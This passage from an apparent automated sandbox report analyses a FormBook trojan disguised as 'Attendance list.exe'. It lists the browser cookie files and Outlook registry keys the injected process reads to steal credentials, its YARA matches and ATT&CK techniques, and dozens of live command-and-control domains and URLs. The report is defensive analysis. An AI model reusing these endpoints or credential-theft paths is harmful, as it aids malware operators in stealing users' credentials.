            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Attendance list.exeBinary or memory string: WIN_81
            Source: Attendance list.exeBinary or memory string: WIN_XP
            Source: Attendance list.exeBinary or memory string: WIN_XPe
            Source: Attendance list.exeBinary or memory string: WIN_VISTA
            Source: Attendance list.exeBinary or memory string: WIN_7
            Source: Attendance list.exeBinary or memory string: WIN_8
            Source: Attendance list.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00936596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00936596
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00936A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00936A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465846 Sample: Attendance list.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 31 www.xn--matfrmn-jxa4m.se 2->31 33 www.xn--fhq1c541j0zr.com 2->33 35 14 other IPs or domains 2->35 39 Snort IDS alert for network traffic 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 7 other signatures 2->45 10 Attendance list.exe 4 2->10         started        signatures3 process4 signatures5 55 Binary is likely a compiled AutoIt script file 10->55 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 13 svchost.exe 10->13         started        process6 signatures7 61 Maps a DLL or memory area into another process 13->61 16 sSzWYtHqcRqHklFYcPzKpLlSXP.exe 13->16 injected process8 dnsIp9 25 www.anuts.top 23.251.54.212, 49733, 49734, 49735 VPSQUANUS United States 16->25 27 parkingpage.namecheap.com 91.195.240.19, 49745, 49746, 49747 SEDO-ASDE Germany 16->27 29 10 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 clip.exe 13 16->20         started        signatures10 process11 signatures12 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 2 other signatures 20->53 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Attendance list.exe50%ReversingLabsWin32.Trojan.Autoit
            Attendance list.exe40%VirustotalBrowse
            Attendance list.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.sandranoll.com9%VirustotalBrowse
            www.dmtxwuatbz.cc2%VirustotalBrowse
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            www.catherineviskadi.com0%VirustotalBrowse
            www.anuts.top8%VirustotalBrowse
            www.helpers-lion.online0%VirustotalBrowse
            parkingpage.namecheap.com0%VirustotalBrowse
            www.hprlz.cz1%VirustotalBrowse
            www.telwisey.info2%VirustotalBrowse
            www.xn--fhq1c541j0zr.com0%VirustotalBrowse
            www.hatercoin.online3%VirustotalBrowse
            www.gipsytroya.com1%VirustotalBrowse
            ghs.googlehosted.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.hatercoin.online/wf3a/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://reg.ru0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/?66s0QHx=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&Jjv=GpKhRVSHzLA8j4R0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA==0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://reg.ru0%VirustotalBrowse
            https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd0%Avira URL Cloudsafe
            http://www.hatercoin.online/wf3a/3%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto0%VirustotalBrowse
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%Avira URL Cloudsafe
            https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd0%VirustotalBrowse
            http://www.catherineviskadi.com/qe66/?66s0QHx=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&Jjv=GpKhRVSHzLA8j4R0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/0%VirustotalBrowse
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%VirustotalBrowse
            https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
            https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking1%VirustotalBrowse
            https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_0%VirustotalBrowse
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%VirustotalBrowse
            http://www.sandranoll.com/aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==100%Avira URL Cloudmalware
            https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=0%VirustotalBrowse
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&0%VirustotalBrowse
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%VirustotalBrowse
            http://www.anuts.top/li0t/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw==0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe1%VirustotalBrowse
            http://www.dmtxwuatbz.cc/lfkn/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&amp;66s0QHx=0lpTRQcDUH0%Avira URL Cloudsafe
            http://www.sandranoll.com/aroo/100%Avira URL Cloudmalware
            http://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%VirustotalBrowse
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/100%Avira URL Cloudmalware
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/0%Avira URL Cloudsafe
            https://www.networksolutions.com/0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw1%VirustotalBrowse
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw==0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/pics/logos/icann.gif0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4R100%Avira URL Cloudmalware
            http://www.helpers-lion.online/mooq/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ==0%Avira URL Cloudsafe
            https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/0%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc0%Avira URL Cloudsafe
            http://www.anuts.top/li0t/0%Avira URL Cloudsafe
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            https://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI0%Avira URL Cloudsafe
            http://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA==0%Avira URL Cloudsafe
            http://www.helpers-lion.online/mooq/0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png0%Avira URL Cloudsafe
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/?66s0QHx=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&Jjv=GpKhRVSHzLA8j4R0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/piwik.png0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sandranoll.com
            		213.145.228.16
            		truetrueunknown
            www.dmtxwuatbz.cc
            		172.67.210.102
            		truetrueunknown
            www.xn--matfrmn-jxa4m.se
            		194.9.94.85
            		truetrueunknown
            www.catherineviskadi.com
            		217.160.0.106
            		truetrueunknown
            www.anuts.top
            		23.251.54.212
            		truetrueunknown
            www.helpers-lion.online
            		194.58.112.174
            		truetrueunknown
            www.bfiworkerscomp.com
            		208.91.197.27
            		truetrue
              		unknown
              parkingpage.namecheap.com
              		91.195.240.19
              		truetrueunknown
              www.telwisey.info
              		199.192.19.19
              		truetrueunknown
              www.hprlz.cz
              		5.44.111.162
              		truefalseunknown
              ghs.googlehosted.com
              		142.250.181.243
              		truefalseunknown
              www.xn--fhq1c541j0zr.com
              		43.252.167.188
              		truetrueunknown
              www.fourgrouw.cfd
              		unknown
              		unknowntrue
                		unknown
                www.hatercoin.online
                		unknown
                		unknowntrueunknown
                www.tinmapco.com
                		unknown
                		unknowntrue
                  		unknown
                  www.gipsytroya.com
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.hatercoin.online/wf3a/false
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.telwisey.info/ei85/?66s0QHx=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&Jjv=GpKhRVSHzLA8j4Rtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.bfiworkerscomp.com/xzzi/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA==true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xn--fhq1c541j0zr.com/rm91/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.bfiworkerscomp.com/xzzi/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.catherineviskadi.com/qe66/?66s0QHx=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&Jjv=GpKhRVSHzLA8j4Rtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sandranoll.com/aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==true
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.anuts.top/li0t/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw==true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dmtxwuatbz.cc/lfkn/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sandranoll.com/aroo/true
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.gipsytroya.com/tf44/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xn--matfrmn-jxa4m.se/4hda/true
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.telwisey.info/ei85/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xn--fhq1c541j0zr.com/rm91/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw==true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xn--matfrmn-jxa4m.se/4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4Rtrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.helpers-lion.online/mooq/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ==true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.catherineviskadi.com/qe66/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.anuts.top/li0t/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA==false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.helpers-lion.online/mooq/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.gipsytroya.com/tf44/?66s0QHx=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&Jjv=GpKhRVSHzLA8j4Rtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabclip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_autosSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://reg.rusSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vdsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.csssSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
